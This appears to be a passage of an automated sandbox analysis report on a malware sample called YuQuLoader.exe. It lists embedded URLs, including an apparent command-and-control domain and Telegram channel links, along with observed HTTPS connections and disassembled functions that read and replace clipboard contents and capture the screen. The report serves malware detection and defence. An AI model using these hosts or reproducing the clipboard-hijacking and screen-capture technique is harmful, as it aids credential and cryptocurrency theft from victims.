                Source: YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589579772.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzSrmal
                Source: YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aR
                Source: YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/b
                Source: YuQuLoader.exe, 00000002.00000003.1652149177.0000000003CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top:443/aNzSMicrosoft
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: YuQuLoader.exe, 00000002.00000003.1400589271.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: YuQuLoader.exe, 00000002.00000003.1400506439.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
                Source: YuQuLoader.exe, 00000002.00000002.2618072393.0000000001598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfqyV-
                Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=3d938ea1e907c113ce_146508105965
                Source: YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: YuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043F3A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043F3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_03B01000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_03B01000
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043F3A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043F3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0043F530 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0043F530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A94D600_2_00A94D60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD1EE00_2_00AD1EE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD26F00_2_00AD26F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9C0A00_2_00A9C0A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC58A00_2_00AC58A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC68A00_2_00AC68A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE28A00_2_00AE28A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF78A00_2_00AF78A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAD8E00_2_00AAD8E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC98F00_2_00AC98F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD18F00_2_00AD18F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF88F00_2_00AF88F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAE0D00_2_00AAE0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AED0D00_2_00AED0D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA80200_2_00AA8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB80200_2_00AB8020
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE90300_2_00AE9030
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA48100_2_00AA4810
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACA8160_2_00ACA816
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B150720_2_00B15072
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A998600_2_00A99860
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9D8700_2_00A9D870
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAD0700_2_00AAD070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA00700_2_00AA0070
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEA0730_2_00AEA073
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACE0500_2_00ACE050
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEA1BB0_2_00AEA1BB
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA79800_2_00AA7980
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9E9E00_2_00A9E9E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B131F80_2_00B131F8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE59E00_2_00AE59E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AED9C00_2_00AED9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFA9C00_2_00AFA9C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABF9200_2_00ABF920
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA51300_2_00AA5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC51300_2_00AC5130
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9C90C0_2_00A9C90C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A961190_2_00A96119
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ADC9100_2_00ADC910
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB71600_2_00AB7160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACD1600_2_00ACD160
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA29400_2_00AA2940
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD01400_2_00AD0140
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACC1500_2_00ACC150
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A99AA00_2_00A99AA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF92A00_2_00AF92A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABEAB00_2_00ABEAB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABD2B00_2_00ABD2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ADC2B00_2_00ADC2B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF62B00_2_00AF62B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A972800_2_00A97280
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF4A800_2_00AF4A80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC82900_2_00AC8290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEC2900_2_00AEC290
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAF2F00_2_00AAF2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAA2F00_2_00AAA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABA2F00_2_00ABA2F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC4AF00_2_00AC4AF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB6A200_2_00AB6A20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ADEA200_2_00ADEA20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA0A100_2_00AA0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB0A100_2_00AB0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF0A100_2_00AF0A10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9AA4A0_2_00A9AA4A
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAFA400_2_00AAFA40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB4A400_2_00AB4A40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC72400_2_00AC7240
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA72500_2_00AA7250
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB2BA00_2_00AB2BA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ADD3A00_2_00ADD3A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE93B90_2_00AE93B9
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A98BB00_2_00A98BB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AED3B00_2_00AED3B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA23800_2_00AA2380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB03800_2_00AB0380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABC3800_2_00ABC380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACFB800_2_00ACFB80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEB3800_2_00AEB380
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF5B800_2_00AF5B80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFA39F0_2_00AFA39F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFD3E80_2_00AFD3E8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB93D00_2_00AB93D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC5BD00_2_00AC5BD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A97B210_2_00A97B21
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA3B200_2_00AA3B20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABFB300_2_00ABFB30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB13300_2_00AB1330
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD4B000_2_00AD4B00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAEB100_2_00AAEB10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABE3100_2_00ABE310
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC53600_2_00AC5360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF03600_2_00AF0360
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAD3400_2_00AAD340
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB5B400_2_00AB5B40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC23500_2_00AC2350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD3B500_2_00AD3B50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE43500_2_00AE4350
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9FCA00_2_00A9FCA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC04A00_2_00AC04A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD04B00_2_00AD04B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEACB00_2_00AEACB0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEE4800_2_00AEE480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF24800_2_00AF2480
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE8C900_2_00AE8C90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE94EB0_2_00AE94EB
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AACCE00_2_00AACCE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB34E00_2_00AB34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC34E00_2_00AC34E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA1CF00_2_00AA1CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC4CF00_2_00AC4CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD4CF00_2_00AD4CF0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE04F00_2_00AE04F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE6CC40_2_00AE6CC4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC1CC00_2_00AC1CC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACBC200_2_00ACBC20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC44300_2_00AC4430
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA44000_2_00AA4400
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE9C000_2_00AE9C00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD6C100_2_00AD6C10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABCC700_2_00ABCC70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC9C700_2_00AC9C70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9C44A0_2_00A9C44A
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA9DA00_2_00AA9DA0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A975B00_2_00A975B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B01DAA0_2_00B01DAA
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE6D8B0_2_00AE6D8B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB05900_2_00AB0590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABDD900_2_00ABDD90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFA5900_2_00AFA590
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA2DE00_2_00AA2DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE5DE00_2_00AE5DE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF85E00_2_00AF85E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A985F00_2_00A985F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9E5C00_2_00A9E5C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA25300_2_00AA2530
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B07D100_2_00B07D10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA65600_2_00AA6560
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9BD400_2_00A9BD40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB45400_2_00AB4540
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF7D400_2_00AF7D40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9A55B0_2_00A9A55B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB6D500_2_00AB6D50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABEE800_2_00ABEE80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE2E800_2_00AE2E80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A96E900_2_00A96E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABFE900_2_00ABFE90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF3E900_2_00AF3E90
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9CEE00_2_00A9CEE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A936F00_2_00A936F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC3ED00_2_00AC3ED0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB5E200_2_00AB5E20
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC76300_2_00AC7630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC7E300_2_00AC7E30
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF46300_2_00AF4630
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A97E000_2_00A97E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA06000_2_00AA0600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABC6000_2_00ABC600
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB3E000_2_00AB3E00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF4E680_2_00AF4E68
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC5E700_2_00AC5E70
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE8E400_2_00AE8E40
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF06400_2_00AF0640
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ADA6500_2_00ADA650
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE9FAB0_2_00AE9FAB
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACA7A00_2_00ACA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE87A00_2_00AE87A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEA7A00_2_00AEA7A0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA57B00_2_00AA57B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEB7B00_2_00AEB7B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AA1F800_2_00AA1F80
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AF97800_2_00AF9780
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABA7900_2_00ABA790
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB97E00_2_00AB97E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ABCFE00_2_00ABCFE0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE37E00_2_00AE37E0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAFFC00_2_00AAFFC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC7FC00_2_00AC7FC0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A947D00_2_00A947D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAF7D00_2_00AAF7D0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB3FD00_2_00AB3FD0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD37200_2_00AD3720
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AAC7300_2_00AAC730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACE7300_2_00ACE730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE47300_2_00AE4730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE57000_2_00AE5700
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A97F100_2_00A97F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9AF100_2_00A9AF10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AC2F100_2_00AC2F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00ACB7100_2_00ACB710
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AD5F100_2_00AD5F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE3F600_2_00AE3F60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AB47700_2_00AB4770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEE7700_2_00AEE770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AE9F4C0_2_00AE9F4C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00A9F7500_2_00A9F750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEF7500_2_00AEF750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AEFF500_2_00AEFF50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044C8702_2_0044C870
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041D0782_2_0041D078
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040B8F02_2_0040B8F0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004479B02_2_004479B0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00412A4D2_2_00412A4D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_004373652_2_00437365
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0040D4C02_2_0040D4C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041CCB62_2_0041CCB6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044BD502_2_0044BD50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0041655F2_2_0041655F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00421E502_2_00421E50
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00417E102_2_00417E10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042FE102_2_0042FE10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0042C6202_2_0042C620
